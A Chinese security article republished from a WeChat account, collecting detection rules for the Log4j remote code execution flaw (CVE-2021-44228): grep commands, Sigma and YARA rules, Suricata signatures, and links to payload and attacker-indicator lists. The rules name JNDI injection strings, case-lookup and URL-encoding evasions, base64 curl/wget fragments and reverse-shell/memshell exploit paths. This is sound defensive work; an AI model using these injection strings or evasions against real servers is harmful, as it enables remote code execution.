Log4j远程代码执行漏洞(CVE-2021-44228)利用检测规则

admin 2021年12月11日18:05:01安全文章评论610 views11861字阅读39分32秒阅读模式

Log4j远程代码执行漏洞(CVE-2021-44228)利用检测规则


国家互联网应急中心CNCERT:

    2021年12月10日,国家信息安全漏洞共享平台(CNVD)收录了Apache Log4j2远程代码执行漏洞(CNVD-2021-95914)。攻击者利用该漏洞,可在未授权的情况下远程执行代码。目前,漏洞利用细节已公开,Apache官方已发布补丁修复该漏洞。CNVD建议受影响用户立即更新至最新版本,同时采取防范性措施避免漏洞攻击威胁。



目录:

(一)、基于主机日志的检测

1.Grep/Zgrep

2.Grep/Zgrep(漏洞利用变种检测)

3.SIGMA规则

4.YARA规则


(二)、基于网络流量的NIDS检测(Snort/Suricata规则)和Zeek检测脚本


(三)其他信息

- 攻击Payload

- C2域名

- 攻击IP

- 受影响的Log4j版本哈希



(一)、基于主机日志的检测:


1.Grep/Zgrep

# sudo egrep -i -r '${jndi:(ldap

展开收缩
?|rmi|dns):/[^n]+' /var/log


# sudo find /var/log -name *.gz -print0 | xargs -0 zgrep -E -i '${jndi:(ldap

展开收缩
?|rmi|dns):/[^n]+'


2.Grep/Zgrep(漏洞利用变种检测)

# sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap

展开收缩
?|rmi|dns):'" ;


# sudo find /var/log/ -name "*.gz" -type f -exec sh -c "zcat {} | sed -e 's/${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap

展开收缩
?|rmi|dns):'"  ;


3.SIGMA规则

1) web_cve_2021_44228_log4j.yml

title: Log4j RCE CVE-2021-44228 Generic

id: 5ea8faa8-db8b-45be-89b0-151b84c82702

status: experimental

description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228

author: Florian Roth

date: 2021/12/10

references:

    - https://www.lunasec.io/docs/blog/log4j-zero-day/

    - https://news.ycombinator.com/item?id=29504755

    - https://github.com/tangxiaofeng7/apache-log4j-poc

    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

    - https://github.com/YfryTchsGD/Log4jAttackSurface

    - https://twitter.com/shutingrz/status/1469255861394866177?s=21

tags:

    - attack.initial_access

    - attack.t1190

logsource:

    category: webserver

detection:

    keywords:

        - '${jndi:ldap:/'

        - '${jndi:rmi:/'

        - '${jndi:ldaps:/'

        - '${jndi:dns:/'

    condition: keywords

falsepositives:

    - Vulnerability scanning

level: high


2) web_cve_2021_44228_log4j_fields.yml

title: Log4j RCE CVE-2021-44228 in Fields

id: 9be472ed-893c-4ec0-94da-312d2765f654

status: experimental

description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs

author: Florian Roth

date: 2021/12/10

references:

   - https://www.lunasec.io/docs/blog/log4j-zero-day/

   - https://news.ycombinator.com/item?id=29504755

   - https://github.com/tangxiaofeng7/apache-log4j-poc

   - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

   - https://github.com/YfryTchsGD/Log4jAttackSurface

   - https://twitter.com/shutingrz/status/1469255861394866177?s=21

tags:

   - attack.initial_access

   - attack.t1190

logsource:

   category: webserver

detection:

   selection:

      cs-User-Agent|contains:

         - '${jndi:ldap:/'

         - '${jndi:rmi:/'

         - '${jndi:ldaps:/'

         - '${jndi:dns:/'

      user-agent|contains:

         - '${jndi:ldap:/'

         - '${jndi:rmi:/'

         - '${jndi:ldaps:/'

         - '${jndi:dns:/'

      cs-uri|contains:

         - '${jndi:ldap:/'

         - '${jndi:rmi:/'

         - '${jndi:ldaps:/'

         - '${jndi:dns:/'

      cs-referrer|contains:

         - '${jndi:ldap:/'

         - '${jndi:rmi:/'

         - '${jndi:ldaps:/'

         - '${jndi:dns:/'

   condition: selection

falsepositives:

    - Vulnerability scanning

level: high


4.YARA规则


rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {

   meta:

      description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"

      author = "Florian Roth"

      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"

      date = "2021-12-10"

      score = 70

   strings:

      $x1 = "${jndi:ldap:/"

      $x2 = "${jndi:rmi:/"

      $x3 = "${jndi:ldaps:/"

      $x4 = "${jndi:dns:/"

   condition:

      1 of them

}


rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {

   meta:

      description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"

      author = "Florian Roth"

      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"

      date = "2021-12-10"

      score = 80

   strings:

      $x1 = /${jndi:(ldap|ldaps|rmi|dns):/[/]?[a-z-.0-9]{3,120}:[0-9]{2,5}/[a-zA-Z.]{1,32}}/

      $fp1r = /(ldap|rmi|ldaps|dns):/[/]?(127.0.0.1|192.168.|172.[1-3][0-9].|10.)/

   condition:

      $x1 and not 1 of ($fp*)

}


rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {

   meta:

      description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"

      author = "Florian Roth"

      reference = "https://twitter.com/Reelix/status/1469327487243071493"

      date = "2021-12-10"

      score = 70

   strings:

      /* curl -s  */

      $sa1 = "Y3VybCAtcy"

      $sa2 = "N1cmwgLXMg"

      $sa3 = "jdXJsIC1zI"

      /* |wget -q -O-  */

      $sb1 = "fHdnZXQgLXEgLU8tI"

      $sb2 = "x3Z2V0IC1xIC1PLS"

      $sb3 = "8d2dldCAtcSAtTy0g"

   condition:

      1 of ($sa*) and 1 of ($sb*)

}


rule SUSP_JDNIExploit_Indicators_Dec21 {

   meta:

      description = "Detects indicators of JDNI usage in log files and other payloads"

      author = "Florian Roth"

      reference = "https://github.com/flypig5211/JNDIExploit"

      date = "2021-12-10"

      score = 70

   strings:

      $xr1 = /ldap://[a-zA-Z0-9.]{7,80}:[0-9]{2,5}/(Basic/Command/Base64|Basic/ReverseShell|Basic/TomcatMemshell|Basic/JBossMemshell|Basic/WebsphereMemshell|Basic/SpringMemshell|Basic/Command|Deserialization/CommonsCollectionsK|Deserialization/CommonsBeanutils|Deserialization/Jre8u20/TomcatMemshell|Deserialization/CVE_2020_2555/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)//

   condition:

      filesize < 100MB and $xr1

}


rule SUSP_EXPL_OBFUSC_Dec21_1{

   meta:

      description = "Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228"

      author = "Florian Roth"

      reference = "https://twitter.com/testanull/status/1469549425521348609"

      date = "2021-12-11"

      score = 60

   strings:

      /* ${lower:X} - single character match */

      $ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }

      /* ${upper:X} - single character match */

      $ = { 24 7B 75 70 70 65 72 3A ?? 7D }

      /* URL encoded lower - obfuscation in URL */

      $ = "$%7blower:"

      $ = "$%7bupper:"

      $ = "%24%7bjndi:"

      $ = "/$%7bjndi:"

   condition:

      1 of them

}


(二)、基于网络流量的NIDS检测(Snort/Suricata规则)和Zeek检测脚本


SID 编号 2034647-2034658


alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034653; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034654; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034655; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034656; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034657; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034658; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


Zeek检测脚本

https://github.com/nturley3/zeek-http-rce


其他:

攻击Payload

https://gist.github.com/nathanqthai/01808c569903f41a52e7e7b575caa890


C2 域名

https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8


攻击IP

https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217


受影响的Log4j版本哈希

https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes


参考资料:

RCE 0-day exploit found in log4j, a popular Java logging package from netsec


往期精选


围观

威胁猎杀实战(六):横向移动攻击检测


热文

全球“三大”入侵分析模型


热文

实战化ATT&CK:威胁情报


原文始发于微信公众号(天御攻防实验室):Log4j远程代码执行漏洞(CVE-2021-44228)利用检测规则

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月11日18:05:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Log4j远程代码执行漏洞(CVE-2021-44228)利用检测规则 https://cn-sec.com/archives/671474.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: